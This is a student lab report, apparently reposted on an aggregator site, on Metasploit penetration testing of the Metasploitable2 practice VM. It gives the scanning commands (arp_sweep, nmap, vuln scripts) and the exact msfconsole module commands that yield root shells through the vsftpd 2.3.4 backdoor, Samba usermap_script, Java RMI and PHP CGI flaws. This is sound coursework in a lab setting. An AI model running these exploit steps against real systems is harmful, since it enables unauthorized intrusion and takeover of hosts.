20232301 2025-2026-1 《网络与系统攻防技术》实验六实验报告

news/2025/11/23 10:50:34/文章来源:https://www.cnblogs.com/zhmp5/p/19232988

实验六 Metasploit攻击渗透实践

一、实验内容

掌握metasploit的用法。
下载官方靶机Metasploitable2,完成下面实验内容。

(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。

(2)攻击如下漏洞:
1.sftpd源码包后门漏洞(21端口)
2.SambaMS-RPC Shell命令注入漏洞(端口139)
3.Java RMI SERVER命令执行漏洞(1099端口)
4.PHP CGI参数执行注入漏洞(80端口)

2.实验过程

2.1前期渗透

2.1.1主机发现

使用ifconfig命令查看靶机ip,为192.168.67.130
image

kali中输入msfconsole进入metasploit
输入如下命令:

search arp_sweep  #搜索ARP扫描辅助模块
use 0 #使用第一个模块arp_sweep
set RHOSTS 192.168.67.0/24  #扫描虚拟机所在网段
run  #开始扫描

image
结果如下:
image
我们发现了刚刚安装的靶机的ip地址,也就是说明其在线,同时括号中标识标识为VMware, Inc.表示其为虚拟机

2.1.2端口扫描

(1)使用nmap
nmap -sS -sV 192.168.67.130
对靶机进行SYN端口扫描和版本探测
结果如下:
image
发现了大量端口
(2)使用Metasploit的Portscan模块实现同样功能
输入如下指令:

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.67.130
set THREADS 10   # 设置并发线程数,提升扫描速度
run

结果如下:
image
同样发现了大量端口
其中不乏一些存在漏洞的端口
例如
139 端口(NetBIOS):易遭爆破、SMB漏洞攻击,黑客可尝试爆破并入侵。
445 端口(SMB):存在 “永恒之蓝” 等漏洞,易被黑客利用传播勒索病毒。
3306 端口(MySQL):易受SQL注入、提权、爆破攻击,可能被黑客获取数据库控制权。

2.1.3漏洞扫描

输入
nmap -script=vuln 192.168.67.130进行漏洞扫描
image

发现了海量结果,我们逐一分析一下:
image
这是vsFTPd 2.3.4的后门漏洞,属于高危漏洞,攻击者可输入含 “😃” 的用户名和任意密码,触发漏洞后目标会开启 6200 后门端口,利用该漏洞直接获取目标主机root权限,完全控制服务器,存在文件篡改、数据窃取、植入恶意程序等严重风险

image
image
在25端口,存在如下漏洞:

  • SSL POODLE 漏洞,攻击者可通过中间人攻击利用 SSL3.0的CBC填充缺陷获取明文数据
  • 匿名Diffie-Hellman密钥交换中间人漏洞,使攻击者能主动篡改会话数据,破坏数据机密性和完整性
  • DHE_EXPORT降级漏洞,可让攻击者将 TLS 会话降级为 512 位加密,轻易破解加密流
  • Diffie-Hellman密钥交换组强度不足漏洞,可能会被破解

对于80端口(web服务):
image
image
存在如下漏洞:

  • Slowloris 拒绝服务漏洞(CVE-2007-6750),攻击者可通过保持大量不完整HTTP连接耗尽服务器资源,导致服务不可用
  • 多处SQL 注入漏洞,黑客可注入恶意 SQL 语句窃取数据库数据、篡改内容甚至获取服务器权限
  • CSRF 漏洞,攻击者可诱导用户在已登录状态下执行非本意操作,比如修改密码、提交恶意请求等

对于1099端口:
image
存在Java RMI注册表远程代码执行漏洞,涉及 1099/tcp端口的rmiregistry服务。这是由于RMI 注册表默认配置允许从远程URL加载类,攻击者可利用此特性注入恶意类,实现远程代码执行。

对于5432端口:
image
image
发现了SSL/TLS相关漏洞:

  • CCS注入漏洞
  • Diffie-Hellman密钥交换组强度不足
  • SSL POODLE信息泄露漏洞

对于6667端口(IRC服务):
image

存在UnrealIRCd IRC服务器后门漏洞,这个漏洞是UnrealIRCd被植入后门的版本,攻击者可通过特定指令直接获取服务器shell权限

对于8180端口(Web服务):
image
image
image

8180 端口存在以下漏洞:

  • Slowloris拒绝服务漏洞:攻击者可通过保持大量不完整 HTTP 连接,耗尽服务器资源,导致服务不可用。
  • JSESSIONID HttpOnly标志未设置:多个 /admin路径下的页面会话cookie未设置HttpOnly标志,易被XSS攻击窃取,进而导致会话劫持,攻击者可冒充管理员执行恶意操作。
  • 后台路径暴露:存在多个可能的/admin管理路径,增加了被暴力破解、路径遍历等攻击的风险。

再用Nessus扫一下:
image
image
结果差不多

2.2漏洞利用

2.2.1Vsftpd源码包后门漏洞(21端口)

进入Metasploit,输入如下命令:

use exploit/unix/ftp/vsftpd_234_backdoor  #使用对应漏洞
set RHOST 192.168.67.130 
exploit 

image
发现我们成功获取了主机shell,并且是root权限

2.2.2 SambaMS-RPC Shell命令注入漏洞(端口139)

指令:

use exploit/multi/samba/usermap_script 
set RHOST 192.168.67.130
exploit 

image
也是非常成功的获取到了shell

2.2.3 Java RMI SERVER命令执行漏洞(1099端口)

输入nmap -p 1099 192.168.67.130用于确认端口是否打开
image
(其实前边已经验证过了)

输入如下命令进行连接:

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.67.130
exploit  
shell 

image
连接成功后,输入shell就成功获取到了root权限的shell

2.2.4 PHP CGI参数执行注入漏洞(80端口)

输入命令:

use exploit/multi/http/php_cgi_arg_injection 
set RHOST 192.168.67.130
exploit 

image

获取shell成功,但是与前边获取到的root用户不同,这次获取到的用户是www-data,也就是 Linux系统中用于运行Web服务器的默认系统用户

3.问题与解决

本次实验还是非常顺利的,主要还是偏验证性实验,再加上靶机非常给力,所以没啥问题
51WA3_AX0AJ@DFO8LSKKFOA

4.感悟与思考

这次实验比起之前的实验的确轻松了不少,还让我有点不适应,主要是因为整体就是输指令-分析漏洞/验证权限,加上之前的实验已经把很多糟心的问题都排除掉了(比如说Reason:Died这种问题)所以很流畅。而且由于用的是官方提供的靶机,所以也比较好攻击,回想起来之前的实验一些靶机死活都攻击不成功,真是形成了鲜明对比,看来以后这些偏练习、验证性的实验可以现寻找一下有没有已经有预设好的靶机,这样可以少浪费很多时间。
之前我已经使用过了Metasploit,但是这次的一系列实验让我看到了,其对于各个存在的漏洞都有攻击方法。这让我对对这个工具的强大之处又有了更深的认识。
虽然实验做完了,但是最重要的实验要理解每条指令和输出结果的实际意义,才能真正将知识记到心里,总的来说,这次实验令我受益匪浅。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/973741.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

增强AI股票预测分析报告 - 2025年11月23日

增强AI股票预测分析报告 - 2025年11月23日body { font-family: "Microsoft YaHei", "Segoe UI", Tahoma, Geneva, Verdana, sans-serif; line-height: 1.6; color: rgba(51, 51, 51, 1); max-widt…

2025年11月中国电动叉车销售公司评测榜:行业权威数据与选购指南

在制造业升级与绿色物流转型的背景下,电动叉车因其低能耗、零排放、高效率的特点,正逐步替代传统内燃叉车,成为仓储物流、港口码头、制造业等领域的核心设备。选择一家可靠的电动叉车销售公司,不仅关乎设备采购成本…

2025年11月石墨电极厂家推荐排名:从生产技术到应用场景的深度比对

作为工业生产中的重要导电材料,石墨电极的质量直接影响着冶金、新能源等行业的设备运行效率与生产成本。2025年随着碳中和政策的深入推进,石墨电极在光伏、锂电池等新兴领域的应用需求持续增长。根据行业调研数据,当…

高性能AI股票预测分析报告 - 2025年11月23日

高性能AI股票预测分析报告 - 2025年11月23日body { font-family: "Microsoft YaHei", "Segoe UI", Tahoma, Geneva, Verdana, sans-serif; line-height: 1.6; color: rgba(51, 51, 51, 1); max-wi…

2025年11月石墨电极厂家评测榜:结合产能与创新能力的综合评估

作为工业生产中的重要导电材料,石墨电极的质量直接关系到冶炼效率与成本控制。许多企业在选择供应商时面临信息不对称的困境,既需要确保产品符合高温抗压、导电稳定性等硬性指标,又需兼顾供货周期与售后支持等软性服…

PySpark - CountVectorizer

PySpark - CountVectorizerIn Spark, I ran below code snippet:# The vocabSize parameter was set to 7 (0 to 6 - a total of 7 words), # meaaning that the vocabulary size (unique words) would be limited to…

2025.11.23笔记

2025.11.23笔记一、双端栈形式:两个栈对开↓↓↓ 二、双端队列形式:定义一个队列两端都可以弹入弹出STL:deque、list 用一个数组模拟:定义head节点和end节点,初始位置在数组中间如果-1.队头插入:head指针向…

Elasticsearch从入门到进阶——搜索优化原理 - 教程

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

AI股票预测分析报告 - 2025年11月23日

AI股票预测分析报告 - 2025年11月23日body { font-family: "Microsoft YaHei", "Segoe UI", Tahoma, Geneva, Verdana, sans-serif; line-height: 1.6; color: rgba(51, 51, 51, 1); max-width: 1…

EDK II PCD的概念、类型、使用

一、基本概念 在 UEFI中,PCD(Platform Configuration Database)是一种用于管理平台配置数据的机制。PCD 允许固件和操作系统在运行时读取和修改配置数据,以支持系统的定制和优化。 目的 为了把代码中可配置的信息抽…

岛屿计数深度解析:DFS与BFS的联系、差异及实战选择

岛屿计数深度解析:DFS与BFS的联系、差异及实战选择在算法面试中,“岛屿计数”是连通性问题的经典代表,也是区分DFS(深度优先搜索)与BFS(广度优先搜索)应用场景的绝佳案例。本文将从题目背景出发,完整拆解两种解…

实验3 熟悉常用的HBase操作

请编程实现以下功能: (1)createTable(String tableName, String[] fields) 创建表,参数tableName为表的名称,字符串数组fields为存储记录各个字段名称的数组。要求当HBase已经存在名为tableName的表的时候,先删除…

实用指南:开源AI智能客服、AI智能名片与S2B2C商城小程序融合下的商家客服能力提升策略研究

实用指南:开源AI智能客服、AI智能名片与S2B2C商城小程序融合下的商家客服能力提升策略研究pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !import…

2025 靠谱白酒商标转让平台测评:资源量 + 过户效率 大比拼

核心结论:福象商标宝 AI(微信小程序)以 200 万 + 全球一手标源、2 个月极速过户、“买标即能用” 的全链条优势,斩获 2025 白酒商标转让平台测评第一名,成为白酒企业布局品牌、拓展市场的首选载体。 据国家知识产…

完整教程:[sam2图像分割] mask_decoder | TwoWayTransformer

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

微内核安全设计原理详解

目录1. 极简的内核空间(内核态)2. 服务运行在用户态并相互隔离3. 强制的、基于能力的进程间通信(IPC)一个生动的比喻微内核的挑战与现状总结简单来说,微内核之所以更安全,其核心思想在于 “最小权限” 和 “机制…

2025国内隐形车衣品牌最新推荐——莱茵骑士,守护原厂漆,源头工厂实力出圈,国产汽车贴膜、汽车装饰贴纸首选服务商

随着汽车保有量的持续增长,车主对爱车养护的需求日益精细化,隐形车衣作为保护原厂漆的核心产品,已从高端车型标配逐渐走向大众化市场。在2025年汽车后市场中,辽宁博超高新科技旗下品牌“莱茵骑士”凭借源头工厂的技…

2025 大型正规商标转让平台测评:5 大头部平台资质、标源全对比

核心结论:福象商标宝 AI(微信小程序)以 98.6 分的综合评分稳居 2025 年商标转让平台榜首,凭借合规资质、海量真实标源、高效服务及全方位保障,成为企业及创业者购买商标的首选平台,尤其适配电商与跨境卖家的急切…

完整教程:攻克兼容、安全、零中断的“不可能三角”:电科金仓异构多活架构交出集团化医院信创最佳答卷!

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

c语言完成队列【由浅入深-数据结构】

c语言完成队列【由浅入深-数据结构】2025-11-23 10:29 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !im…